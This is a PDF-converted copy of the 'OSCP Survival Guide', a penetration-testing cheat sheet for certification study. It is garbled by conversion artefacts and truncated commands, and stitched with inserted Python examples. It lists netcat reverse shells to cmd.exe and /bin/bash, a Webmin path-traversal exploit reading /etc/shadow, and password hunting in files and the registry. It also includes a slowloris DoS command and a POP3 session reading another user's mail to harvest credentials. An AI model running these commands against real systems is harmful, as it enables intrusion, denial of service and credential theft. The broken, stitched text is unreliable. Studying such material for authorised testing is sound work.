OSCP Survival Guide

Uploaded to Scribd by kumarshaurya0711 (101 pages). Originally a Pastebin paste by a guest, Nov 22nd, 2017.
# OSCP-Survival-Guide

<pre>
_____ _____ _____ ______ _____ _ _ _____ _ _
| _ / ___/ __ \| ___ \ / ___| (_) | | | __ \ (_) | |
| | | \ `--.| / \/| |_/ / \ `--. _ _ _ ____ _____ ____ _| | | | \/_ _ _ __| | ___
| | | |`--. \ | | __/ `--. \ | | | '__\ \ / / \ \ / / _` | | | | __| | | | |/ _` |/ _ \
\ \_/ /\__/ / \__/\| | /\__/ / |_| | | \ V /| |\ V / (_| | | | |_\ \ |_| | | (_| | __/
\___/\____/ \____/\_| \____/ \__,_|_| \_/ |_| \_/ \__,_|_| \____/\__,_|_|\__,_|\___|
</pre>

Kali Linux Offensive Security Certified Professional Playbook

**NOTE: This document refers to the target IP as the exported variable `$ip`.**

**To set this value on the command line, use the following syntax:**

**`export ip=192.168.1.100`**

***UPDATE: October 2, 2017***

Thanks for all the Stars! Wrote my OSCP exam last night, did not pass sadly ... but I recorded a stop motion video of my failed attempt. TRY HARDER!

https://www.youtube.com/watch?v=HBMZWl9zcsc

The good news is that I will be learning more and adding more content to this guide :D

## Table of Contents

- [Kali Linux](#kali-linux)
- [Information Gathering & Vulnerability Scanning](#information-gathering--vulnerability-scanning)
  * [Passive Information Gathering](#passive-information-gathering)
  * [Active Information Gathering](#active-information-gathering)
  * [Port Scanning](#port-scanning)
  * [Enumeration](#enumeration)
  * [HTTP Enumeration](#http-enumeration)
- [Buffer Overflows and Exploits](#buffer-overflows-and-exploits)
- [Shells](#shells)
- [File Transfers](#file-transfers)
- [Privilege Escalation](#privilege-escalation)
  * [Linux Privilege Escalation](#linux-privilege-escalation)
  * [Windows Privilege Escalation](#windows-privilege-escalation)
- [Client, Web and Password Attacks](#client-web-and-password-attacks)
  * [Client Attacks](#client-attacks)
  * [Web Attacks](#web-attacks)
  * [File Inclusion Vulnerabilities LFI/RFI](#file-inclusion-vulnerabilities)
  * [Database Vulnerabilities](#database-vulnerabilities)
  * [Password Attacks](#password-attacks)
  * [Password Hash Attacks](#password-hash-attacks)
- [Networking, Pivoting and Tunneling](#networking-pivoting-and-tunneling)
- [The Metasploit Framework](#the-metasploit-framework)
- [Bypassing Antivirus Software](#bypassing-antivirus-software)
Kali Linux
========================================================================================================

- Set the Target IP Address to the `$ip` system variable

  `export ip=192.168.1.100`

- Find the location of a file

  `locate sbd.exe`

- Search through directories in the `$PATH` environment variable

  `which sbd`

- Find a file whose name contains a specific string:

  `find / -name sbd\*`

- Show active internet connections

  `netstat -lntp`

- Change Password

  `passwd`

- Verify a service is running and listening

  `netstat -antp | grep apache`

- Start a service

  `systemctl start ssh`

  `systemctl start apache2`

- Have a service start at boot

  `systemctl enable ssh`

- Stop a service

  `systemctl stop ssh`

- Unzip a gz file

  `gunzip access.log.gz`

- Unzip a tar.gz file

  `tar -xzvf file.tar.gz`

- Search command history

  `history | grep phrase_to_search_for`

- Download a webpage

  `wget http://www.cisco.com`

- Open a webpage

  `curl http://www.cisco.com`

- String manipulation

  - Count the number of lines in a file

    `wc -l index.html`

  - Get the start or end of a file

    `head index.html`

    `tail index.html`

  - Extract all the lines that contain a string

    `grep "href=" index.html`

  - Cut a string by a delimiter, filter results then sort

    `grep "href=" index.html | cut -d "/" -f 3 | grep "\." | cut -d '"' -f 1 | sort -u`

  - Using grep and regular expressions and output to a file

    `cat index.html | grep -o 'http://[^"]*' | cut -d "/" -f 3 | sort -u > list.txt`

  - Use a bash loop to find the IP address behind each host

    `for url in $(cat list.txt); do host $url; done`

  - Collect all the IP addresses from a log file and sort by frequency

    `cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn`
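The two pipelines just above (the `grep -o 'http://...' | cut | sort -u` hostname extraction and the `cut | sort | uniq -c | sort -urn` access-log count) written out in Python, as an added example that is not part of the original guide. The HTML snippet and the access-log lines are constructed for the example; on a real log the second function is the quickest way to see which client is hammering a web server (a scanner typically tops the list with a run of 404s).

```python
"""Python equivalents of the two shell pipelines in the String manipulation
section. Added example, not from the original guide; sample inputs are
constructed, not real data."""
import re
from collections import Counter
from urllib.parse import urlparse

# Constructed HTML standing in for index.html.
SAMPLE_HTML = '''
<a href="http://www.cisco.com/c/en/us/index.html">Home</a>
<a href="http://tools.cisco.com/security/center/home.x">Security</a>
<a href="http://www.cisco.com/about">About</a>
<a href="/relative/path">Relative link (no scheme, not matched)</a>
'''

# Constructed access.log lines in Common Log Format; field 1 is the client IP.
SAMPLE_ACCESS_LOG = """\
10.0.0.5 - - [10/Oct/2017:13:55:36 +0000] "GET / HTTP/1.1" 200 2326
192.168.1.77 - - [10/Oct/2017:13:55:37 +0000] "GET /admin HTTP/1.1" 404 512
192.168.1.77 - - [10/Oct/2017:13:55:37 +0000] "GET /.git/config HTTP/1.1" 404 512
10.0.0.5 - - [10/Oct/2017:13:55:38 +0000] "GET /about HTTP/1.1" 200 1122
192.168.1.77 - - [10/Oct/2017:13:55:39 +0000] "GET /wp-login.php HTTP/1.1" 404 512
172.16.3.9 - - [10/Oct/2017:13:56:01 +0000] "GET / HTTP/1.1" 200 2326
"""

# Same pattern the guide passes to grep -o: an http:// URL up to the closing quote.
URL_RE = re.compile(r'http://[^"]*')


def extract_hosts(html):
    """Equivalent of: grep -o 'http://[^"]*' | cut -d "/" -f 3 | sort -u.
    Field 3 of a URL split on '/' is the host, so urlparse().hostname matches it."""
    hosts = {urlparse(url).hostname for url in URL_RE.findall(html)}
    return sorted(h for h in hosts if h)


def top_ips(log_text):
    """Equivalent of: cut -d " " -f 1 | sort | uniq -c | sort -urn.
    Returns (ip, count) pairs, most frequent first; ties broken by IP string."""
    counts = Counter(line.split(" ", 1)[0]
                     for line in log_text.splitlines() if line.strip())
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    for host in extract_hosts(SAMPLE_HTML):
        print(host)
    for ip, n in top_ips(SAMPLE_ACCESS_LOG):
        print(f"{n:6d} {ip}")
```

`top_ips` keys on the first space-separated field, exactly as `cut -d " " -f 1` does, so it works on any log whose first column is the client address; for logs behind a reverse proxy the interesting column is usually `X-Forwarded-For` instead, which the shell one-liner and this function both ignore.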

128.
129. - Decoding using Kali

130.

131. - Decode Base64 Encoded Values

132.
133. `echo -n "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode`

134.

135. - Decode Hexidecimal Encoded Values


136. `echo -n "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874" | xxd -r -ps`

137.

138. - Netcat - Read and write TCP and UDP Packets


139.

140. - Download Netcat for Windows (handy for creating reverse shells and transfering files on windows systems):

141. [https://joncraton.org/blog/46/netcat-for-windows/](https://joncraton.org/blog/46/netcat-for-windows/)

142.
143. - Connect to a POP3 mail server

144. `nc -nv $ip 110`

145.
146. - Listen on TCP/UDP port

147. `nc -nlvp 4444`

148.
149. - Connect to a netcat port

150. `nc -nv $ip 4444`

151.

152. - Send a file using netcat


153. `nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe`

154.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
155. - Receive a file using netcat

156. `nc -nlvp 4444 > incoming.exe`

157.
158. - Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that...

159.

160. whereis nc
161. nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz

162.

163. /bin/nc.traditional -e /bin/bash 1.2.3.4 4444

164.
165.

166. - Create a reverse shell with Ncat using cmd.exe on Windows

167. `nc.exe -nlvp 4444 -e cmd.exe`


168.

169. or

170.
171. `nc.exe -nv <Remote IP> <Remote Port> -e cmd.exe`

172.

173. - Create a reverse shell with Ncat using bash on Linux

174. `nc -nv $ip 4444 -e /bin/bash`


175.

176. - Netcat for Banner Grabbing:

177.
178. `echo "" | nc -nv -w1 <IP Address> <Ports>`

179.

180. - Ncat - Netcat for Nmap project which provides more security avoid
181. IDS

182.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
183. - Reverse shell from windows using cmd.exe using ssl
184. `ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl`

185.

186. - Listen on port 4444 using ssl


187. `ncat -v $ip 4444 --ssl`

188.

189. - Wireshark
190. - Show only SMTP (port 25) and ICMP traffic:

191.

192. `tcp.port eq 25 or icmp`


193.

194. - Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet:

195.

196. `ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16`


197.

198. - Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs:

199.
200. `ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip`

201.

202. - Some commands are equal


203.

204. `ip.addr == xxx.xxx.xxx.xxx`

205.

206. Equals
207.

208. `ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx `

209.
210. ` ip.addr != xxx.xxx.xxx.xxx`

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
211.

212. Equals
213.
214. `ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx`

215.
216. - Tcpdump
217.

218. - Display a pcap file


219. `tcpdump -r passwordz.pcap`

220.
221. - Display ips and filter and sort
222. `tcpdump -n -r passwordz.pcap | awk -F" " '{print $3}' | sort -u | head`

223.
224. - Grab a packet capture on port 80
225. `tcpdump tcp port 80 -w output.pcap -i eth0`

226.
227. - Check for ACK or PSH flag set in a TCP packet
228. `tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap`
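What the `tcp[13] = 24` expression above actually tests, as an added example that is not part of the original guide: byte 13 of the TCP header is the flags byte, and 24 is 0x18 = PSH (0x08) + ACK (0x10). The header bytes below are constructed with `struct` for illustration; the two helper functions show the difference between the exact match the guide's filter performs and a mask test (`tcp[13] & 24 == 24`) that also matches segments carrying extra flags such as URG.

```python
"""Decode the TCP flags byte that 'tcp[13] = 24' inspects. Added example,
not from the original guide; header bytes are constructed here."""
import struct

# Flag bits of TCP header byte 13, least significant bit first.
TCP_FLAGS = {
    0x01: "FIN", 0x02: "SYN", 0x04: "RST", 0x08: "PSH",
    0x10: "ACK", 0x20: "URG", 0x40: "ECE", 0x80: "CWR",
}


def build_tcp_header(src_port, dst_port, flags, seq=0, ack=0, window=65535):
    """Build a minimal 20-byte TCP header (no options) in network byte order.
    Data offset is 5 words, so byte 12 is 0x50 and byte 13 is the flags byte."""
    offset_byte = 5 << 4
    return struct.pack("!HHIIBBHHH", src_port, dst_port, seq, ack,
                       offset_byte, flags, window, 0, 0)


def tcp_flags(header):
    """Return the set of flag names set in a raw TCP header."""
    if len(header) < 14:
        raise ValueError("TCP header too short to contain a flags byte")
    byte13 = header[13]
    return {name for bit, name in TCP_FLAGS.items() if byte13 & bit}


def matches_exact(header, value):
    """BPF 'tcp[13] = value': the whole flags byte must equal value, so 24
    matches PSH+ACK only, not a bare ACK and not PSH+ACK+URG."""
    return header[13] == value


def matches_mask(header, mask):
    """BPF 'tcp[13] & mask == mask': every bit in mask is set, other bits ignored."""
    return header[13] & mask == mask


if __name__ == "__main__":
    for name, flags in (("PSH+ACK", 0x18), ("ACK", 0x10), ("PSH+ACK+URG", 0x38)):
        h = build_tcp_header(49152, 80, flags)
        print(f"{name:12s} exact(24)={matches_exact(h, 24)!s:5s} "
              f"mask(24)={matches_mask(h, 24)!s:5s} {sorted(tcp_flags(h))}")
```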

229.
230. - IPTables
231.

232. - Deny traffic to ports except for Local Loopback


233.
234. `iptables -A INPUT -p tcp --destination-port 13327 ! -d $ip -j DROP `

235.
236. `iptables -A INPUT -p tcp --destination-port 9991 ! -d $ip -j DROP`
237.

238. - Clear ALL IPTables firewall rules

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
239.

240. iptables -P INPUT ACCEPT


241. iptables -P FORWARD ACCEPT

242. iptables -P OUTPUT ACCEPT


243. iptables -t nat -F
244. iptables -t mangle -F

245. iptables -F
246. iptables -X
247. iptables -t raw -F iptables -t raw -X

248.
249. Information Gathering & Vulnerability Scanning
250. ===================================================================================================================================

251.
252. - Passive Information Gathering
253. ---------------------------------------------------------------------------------------------------------------------------

254.
255. - Google Hacking
256.

257. - Google search to find website sub domains


258. `site:microsoft.com`
259.

260. - Google filetype, and intitle


261. `intitle:"netbotz appliance" "OK" -filetype:pdf`

262.
263. - Google inurl
264. `inurl:"level/15/sexec/-/show"`

265.
266. - Google Hacking Database:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
267. https://www.exploit-db.com/google-hacking-database/
268.
269. - SSL Certificate Testing

270. [https://www.ssllabs.com/ssltest/analyze.html](https://www.ssllabs.com/ssltest/analyze.html)
271.
272. - Email Harvesting

273.
274. - Simply Email
275. `git clone https://github.com/killswitch-GUI/SimplyEmail.git `

276.
277. `./SimplyEmail.py -all -e TARGET-DOMAIN`
278.

279. - Netcraft
280.
281. - Determine the operating system and tools used to build a site

282. https://searchdns.netcraft.com/
283.

284. - Whois Enumeration


285. `whois domain-name-here.com `
286.

287. `whois $ip`


288.
289. - Banner Grabbing

290.
291. - `nc -v $ip 25`
292.

293. - `telnet $ip 25`


294.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
295. - `nc TARGET-IP 80`
296.
297. - Recon-ng - full-featured web reconnaissance framework written in Python

298.
299. - `cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git `
300.

301. `cd /opt/recon-ng `


302.

303. `./recon-ng `
304.
305. `show modules `

306.
307. `help`
308.

309. - Active Information Gathering


310. --------------------------------------------------------------------------------------------------------------------------
311.

312. <!-- -->


313.
314.

315. - Port Scanning


316. -----------------------------------------------------------------------------------------------------------
317. *Subnet Reference Table*

318.
319. / | Addresses | Hosts | Netmask | Amount of a Class C
320. --- | --- | --- | --- | ---

321. /30 | 4 | 2 | 255.255.255.252| 1/64


322. /29 | 8 | 6 | 255.255.255.248 | 1/32

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
323. /28 | 16 | 14 | 255.255.255.240 | 1/16
324. /27 | 32 | 30 | 255.255.255.224 | 1/8

325. /26 | 64 | 62 | 255.255.255.192 | 1/4


326. /25 | 128 | 126 | 255.255.255.128 | 1/2
327. /24 | 256 | 254 | 255.255.255.0 | 1

328. /23 | 512 | 510 | 255.255.254.0 | 2


329. /22 | 1024 | 1022 | 255.255.252.0 | 4
330. /21 | 2048 | 2046 | 255.255.248.0 | 8

331. /20 | 4096 | 4094 | 255.255.240.0 | 16


332. /19 | 8192 | 8190 | 255.255.224.0 | 32
333. /18 | 16384 | 16382 | 255.255.192.0 | 64

334. /17 | 32768 | 32766 | 255.255.128.0 | 128


335. /16 | 65536 | 65534 | 255.255.0.0 | 256
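The subnet table above can be regenerated for any prefix length rather than looked up. The following is an added example, not part of the original guide, using only the standard library's `ipaddress` module; it goes beyond the table in that it accepts any /0 to /32 prefix and can also tell you whether a given address falls inside a scan range before you run anything against it.

```python
"""Compute subnet reference rows (addresses, usable hosts, netmask, fraction
of a /24) for any IPv4 prefix. Added example, not from the original guide."""
import ipaddress
from fractions import Fraction


def subnet_row(prefix):
    """Return (addresses, usable hosts, dotted netmask, class-C fraction) for /prefix.
    Usable hosts subtracts the network and broadcast addresses, as the table does;
    /31 and /32 have no such reservation, so all their addresses count."""
    if not 0 <= prefix <= 32:
        raise ValueError("IPv4 prefix length must be between 0 and 32")
    net = ipaddress.ip_network(f"0.0.0.0/{prefix}")
    addresses = net.num_addresses
    hosts = addresses - 2 if prefix <= 30 else addresses
    return addresses, hosts, str(net.netmask), Fraction(addresses, 256)


def fraction_str(frac):
    """Render Fraction(1, 64) as '1/64' and Fraction(4, 1) as '4', like the table."""
    if frac.denominator == 1:
        return str(frac.numerator)
    return f"{frac.numerator}/{frac.denominator}"


def reference_table(start=30, stop=16):
    """Rows from /start down to /stop in the guide's column order."""
    rows = []
    for p in range(start, stop - 1, -1):
        addresses, hosts, mask, frac = subnet_row(p)
        rows.append((f"/{p}", addresses, hosts, mask, fraction_str(frac)))
    return rows


def in_scope(cidr, address):
    """True if address lies inside the CIDR block; useful for checking a target
    against an agreed scan scope before launching a scan."""
    return ipaddress.ip_address(address) in ipaddress.ip_network(cidr, strict=False)


if __name__ == "__main__":
    print("/ | Addresses | Hosts | Netmask | Amount of a Class C")
    for row in reference_table():
        print(" | ".join(str(c) for c in row))
```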
- Set the IP address as a variable

  `export ip=192.168.1.100`

  `nmap -A -T4 -p- $ip`

- Netcat port scanning

  `nc -nvv -w 1 -z $ip 3388-3390`

- Discover active IPs using ARP on the network:

  `arp-scan $ip/24`

- Discover who else is on the network

  `netdiscover`

- Discover IP, MAC and MAC vendors from ARP

  `netdiscover -r $ip/24`

- Nmap stealth scan using SYN

  `nmap -sS $ip`

- Nmap stealth scan using FIN

  `nmap -sF $ip`

- Nmap Banner Grabbing

  `nmap -sV -sT $ip`

- Nmap OS Fingerprinting

  `nmap -O $ip`

- Nmap Regular Scan:

  `nmap $ip/24`

- Enumeration Scan

  `nmap -p 1-65535 -sV -sS -A -T4 $ip/24 -oN nmap.txt`

- Enumeration Scan All Ports TCP / UDP and output to a txt file

  `nmap -oN nmap2.txt -v -sU -sS -p- -A -T4 $ip`

- Nmap output to a file:

  `nmap -oN nmap.txt -p 1-65535 -sV -sS -A -T4 $ip/24`

- Quick Scan:

  `nmap -T4 -F $ip/24`

- Quick Scan Plus:

  `nmap -sV -T4 -O -F --version-light $ip/24`

- Quick traceroute

  `nmap -sn --traceroute $ip`

- All TCP and UDP Ports

  `nmap -v -sU -sS -p- -A -T4 $ip`

- Intense Scan:

  `nmap -T4 -A -v $ip`

- Intense Scan Plus UDP

  `nmap -sS -sU -T4 -A -v $ip/24`

- Intense Scan ALL TCP Ports

  `nmap -p 1-65535 -T4 -A -v $ip/24`

- Intense Scan - No Ping

  `nmap -T4 -A -v -Pn $ip/24`

- Ping scan

  `nmap -sn $ip/24`

- Slow Comprehensive Scan

  `nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" $ip/24`

- Scan with a full TCP connect in order to weed out any spoofed ports designed to troll you

  `nmap -p1-65535 -A -T5 -sT $ip`

- Enumeration
-----------

- DNS Enumeration

  - Nmap DNS Hostnames Lookup

    `nmap -F --dns-server <dns server ip> <target ip range>`

  - Host Lookup

    `host -t ns megacorpone.com`

  - Reverse Lookup Brute Force - find domains in the same range

    `for ip in $(seq 155 190); do host 50.7.67.$ip; done | grep -v "not found"`

  - Perform DNS IP Lookup

    `dig a domain-name-here.com @nameserver`

  - Perform MX Record Lookup

    `dig mx domain-name-here.com @nameserver`

  - Perform Zone Transfer with DIG

    `dig axfr domain-name-here.com @nameserver`

- DNS Zone Transfers

  Windows DNS zone transfer

  `nslookup -> set type=any -> ls -d blah.com`

  Linux DNS zone transfer

  `dig axfr blah.com @ns1.blah.com`

- Dnsrecon DNS Brute Force

  `dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml output.xml`

- Dnsrecon DNS List of megacorp

  `dnsrecon -d megacorpone.com -t axfr`

- DNSEnum

  `dnsenum zonetransfer.me`

- Nmap Enumeration Script List:

  - Nmap Discovery

    [*https://nmap.org/nsedoc/categories/discovery.html*](https://nmap.org/nsedoc/categories/discovery.html)

  - Nmap port version detection MAXIMUM power

    `nmap -vvv -A --reason --script="+(safe or default) and not broadcast" -p <port> <host>`

- NFS (Network File System) Enumeration

  - Show Mountable NFS Shares

    `nmap -sV --script=nfs-showmount $ip`

- RPC (Remote Procedure Call) Enumeration

  - Connect to an RPC share without a username and password and enumerate privileges

    `rpcclient --user="" --command=enumprivs -N $ip`

  - Connect to an RPC share with a username and enumerate privileges

    `rpcclient --user="<Username>" --command=enumprivs $ip`

- SMB Enumeration

  - SMB OS Discovery

    `nmap $ip --script smb-os-discovery.nse`

  - Nmap port scan

    `nmap -v -p 139,445 -oG smb.txt $ip-254`

  - NetBIOS Information Scanning

    `nbtscan -r $ip/24`

  - Nmap find exposed NetBIOS servers

    `nmap -sU --script nbstat.nse -p 137 $ip`

  - Nmap all SMB scripts scan

    `nmap -sV -Pn -vv -p 445 --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip`

  - Nmap all SMB scripts authenticated scan

    `nmap -sV -Pn -vv -p 445 --script-args smbuser=<username>,smbpass=<password> --script='(smb*) and not (brute or broadcast or dos or external or fuzzer)' --script-args=unsafe=1 $ip`

  - SMB Enumeration Tools

    `nmblookup -A $ip`

    `smbclient //MOUNT/share -I $ip -N`

    `rpcclient -U "" $ip`

    `enum4linux $ip`

    `enum4linux -a $ip`

  - SMB Fingerprinting

    `smbclient -L //$ip`

  - Nmap Scan for Open SMB Shares

    `nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.10.0/24`

  - Nmap scans for vulnerable SMB Servers (the `smb-check-vulns` script was removed from recent Nmap releases; the `smb-vuln-*` scripts replace it)

    `nmap -v -p 445 --script=smb-check-vulns --script-args=unsafe=1 $ip`

  - Nmap List all SMB scripts installed

    `ls -l /usr/share/nmap/scripts/smb*`

  - Enumerate SMB Users

    `nmap -sU -sS --script=smb-enum-users -p U:137,T:139 $ip-14`

    OR

    `python /usr/share/doc/python-impacket-doc/examples/samrdump.py $ip`

  - RID Cycling - Null Sessions

    `ridenum.py $ip 500 50000 dict.txt`

  - Manual Null Session Testing

    Windows: `net use \\$ip\IPC$ "" /u:""`

    Linux: `smbclient -L //$ip`

- SMTP Enumeration - Mail Servers

  - Verify SMTP port using Netcat

    `nc -nv $ip 25`

- POP3 Enumeration - Reading other people's mail - You may find usernames and passwords for email accounts, so here is how to check the mail using Telnet

  ```
  root@kali:~# telnet $ip 110
  +OK beta POP3 server (JAMES POP3 Server 2.3.2) ready
  USER billydean
  +OK
  PASS password
  +OK Welcome billydean
  list
  +OK 2 1807
  1 786
  2 1021
  retr 1
  +OK Message follows
  From: jamesbrown@motown.com
  Dear Billy Dean,

  Here is your login for remote desktop ... try not to forget it this time!
  username: billydean
  password: PA$$W0RD!Z
  ```


568.
569.
570. - SNMP Enumeration -Simple Network Management Protocol

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
571.

572. - Fix SNMP output values so they are human readable


573. `apt-get install snmp-mibs-downloader download-mibs `
574. `echo "" > /etc/snmp/snmp.conf`
575.
576. - SNMP Enumeration Commands
577.

578. - `snmpcheck -t $ip -c public`


579.
580. - `snmpwalk -c public -v1 $ip 1|`
581.
582. - `grep hrSWRunName|cut -d\* \* -f`

583.
584. - `snmpenum -t $ip`
585.
586. - `onesixtyone -c names -i hosts`
587.
588. - SNMPv3 Enumeration

589. `nmap -sV -p 161 --script=snmp-info $ip/24`


590.
591. - Automate the username enumeration process for SNMPv3:
592. `apt-get install snmp snmp-mibs-downloader `
593. `wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb`
594.

595. - SNMP Default Credentials


596. /usr/share/metasploit-framework/data/wordlists/snmp\_default\_pass.txt
597.
598.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
599. - MS SQL Server Enumeration

600.
601. - Nmap Information Gathering
602.
603. `nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-
sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-

port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip`
604.
605. - Webmin and miniserv/0.01 Enumeration - Port 10000
606.
607. Test for LFI & file disclosure vulnerability by grabbing /etc/passwd
608.

609. `curl
http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01
610.
611. Test to see if webmin is running as root by grabbing /etc/shadow
612.
613. `curl

http://$ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01
614.
615. - Linux OS Enumeration
616.
617. - List all SUID files
618. `find / -perm -4000 2>/dev/null`

619.
620. - Determine the current version of Linux
621. `cat /etc/issue`
622.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
623. - Determine more information about the environment
624. `uname -a`
625.
626. - List processes running
627. `ps -xaf`
628.

629. - List the allowed (and forbidden) commands for the invoking use
630. `sudo -l`
631.
632. - List iptables rules
633. `iptables --table nat --list
634. iptables -vL -t filter

635. iptables -vL -t nat


636. iptables -vL -t mangle
637. iptables -vL -t raw
638. iptables -vL -t security`
639.

640. - Windows OS Enumeration


641.
642.
643. - net config Workstation
644.
645. - systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

646.
647. - hostname
648.
649. - net users
650.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
651. - ipconfig /all
652.
653. - route print
654.
655. - arp -A
656.

657. - netstat -ano


658.
659. - netsh firewall show state
660.
661. - netsh firewall show config

662.
663. - schtasks /query /fo LIST /v
664.
665. - tasklist /SVC
666.
667. - net start

668.
669. - DRIVERQUERY
670.
671. - reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
672.
673. - reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

674.
675. - dir /s *pass* == *cred* == *vnc* == *.config*
676.
677. - findstr /si password *.xml *.ini *.txt
678.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
679. - reg query HKLM /f password /t REG_SZ /s
680.
681. - reg query HKCU /f password /t REG_SZ /s
682.
683. - Vulnerability Scanning with Nmap

684.
685. - Nmap Exploit Scripts
686. [*https://nmap.org/nsedoc/categories/exploit.html*](https://nmap.org/nsedoc/categories/exploit.html)
687.
688. - Nmap search through vulnerability scripts
689. `cd /usr/share/nmap/scripts/

690. ls -l \*vuln\*`
691.
692. - Nmap search through Nmap Scripts for a specific keyword
693. `ls /usr/share/nmap/scripts/\* | grep ftp`
694.
695. - Scan for vulnerable exploits with nmap

696. `nmap --script exploit -Pn $ip`


697.
698. - NMap Auth Scripts
699. [*https://nmap.org/nsedoc/categories/auth.html*](https://nmap.org/nsedoc/categories/auth.html)
700.
701. - Nmap Vuln Scanning

702. [*https://nmap.org/nsedoc/categories/vuln.html*](https://nmap.org/nsedoc/categories/vuln.html)
703.
704. - NMap DOS Scanning
705. `nmap --script dos -Pn $ip
706. NMap Execute DOS Attack

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
707. nmap --max-parallelism 750 -Pn --script http-slowloris --script-args
708. http-slowloris.runforever=true`
709.
710. - Scan for coldfusion web vulnerabilities
711. `nmap -v -p 80 --script=http-vuln-cve2010-2861 $ip`

712.
713. - Anonymous FTP dump with Nmap
714. `nmap -v -p 21 --script=ftp-anon.nse $ip-254`
715.
716. - SMB Security mode scan with Nmap
717. `nmap -v -p 21 --script=ftp-anon.nse $ip-254`

718.
719. - File Enumeration
720.
721. - Find UID 0 files root execution
722.
723. - `/usr/bin/find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null`

724.
725. - Get handy linux file system enumeration script (/var/tmp)
726. `wget https://highon.coffee/downloads/linux-local-enum.sh `
727. `chmod +x ./linux-local-enum.sh `
728. `./linux-local-enum.sh`

729.
730. - Find executable files updated in August
731. `find / -executable -type f 2> /dev/null | egrep -v "^/bin|^/var|^/etc|^/usr" | xargs ls -lh | grep Aug`
732.
733. - Find a specific file on linux
734. `find /. -name suid\*`

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
735.
736. - Find all the strings in a file
737. `strings <filename>`
738.
739. - Determine the type of a file

740. `file <filename>`


741.
742. - HTTP Enumeration
743. ----------------
744.

745. - Search for folders with gobuster:


746. `gobuster -w /usr/share/wordlists/dirb/common.txt -u $ip`
747.
748. - OWasp DirBuster - Http folder enumeration - can take a dictionary file
749.
750. - Dirb - Directory brute force finding using a dictionary file

751. `dirb http://$ip/ wordlist.dict `


752. `dirb <http://vm/> `
753.
754. Dirb against a proxy
755.
756. - `dirb [http://$ip/](http://172.16.0.19/) -p $ip:3129`

757.
758. - Nikto
759. `nikto -h $ip`
760.
761. - HTTP Enumeration with NMAP
762. `nmap --script=http-enum -p80 -n $ip/24`

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
763.
764. - Nmap Check the server methods
765. `nmap --script http-methods --script-args http-methods.url-path='/test' $ip`
766.

767. - Get Options available from web server


768. `curl -vX OPTIONS vm/test`
769.
770. - Uniscan directory finder:
771. `uniscan -qweds -u <http://vm/>`
772.

773. - Wfuzz - The web brute forcer


774.
775. `wfuzz -c -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?FUZZ=test `
776.
777. `wfuzz -c --hw 114 -w /usr/share/wfuzz/wordlist/general/megabeast.txt $ip:60080/?page=FUZZ `
778.

779. `wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt "$ip:60080/?page=mailer&mail=FUZZ"`


780.
781. `wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 $ip/FUZZ`
782.
783. Recurse level 3
784.

785. `wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 $ip/FUZZ`


786.
787. <!-- -->
788.
789. - Open a service using a port knock (Secured with Knockd)

790. for x in 7000 8000 9000; do nmap -Pn --host\_timeout 201

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
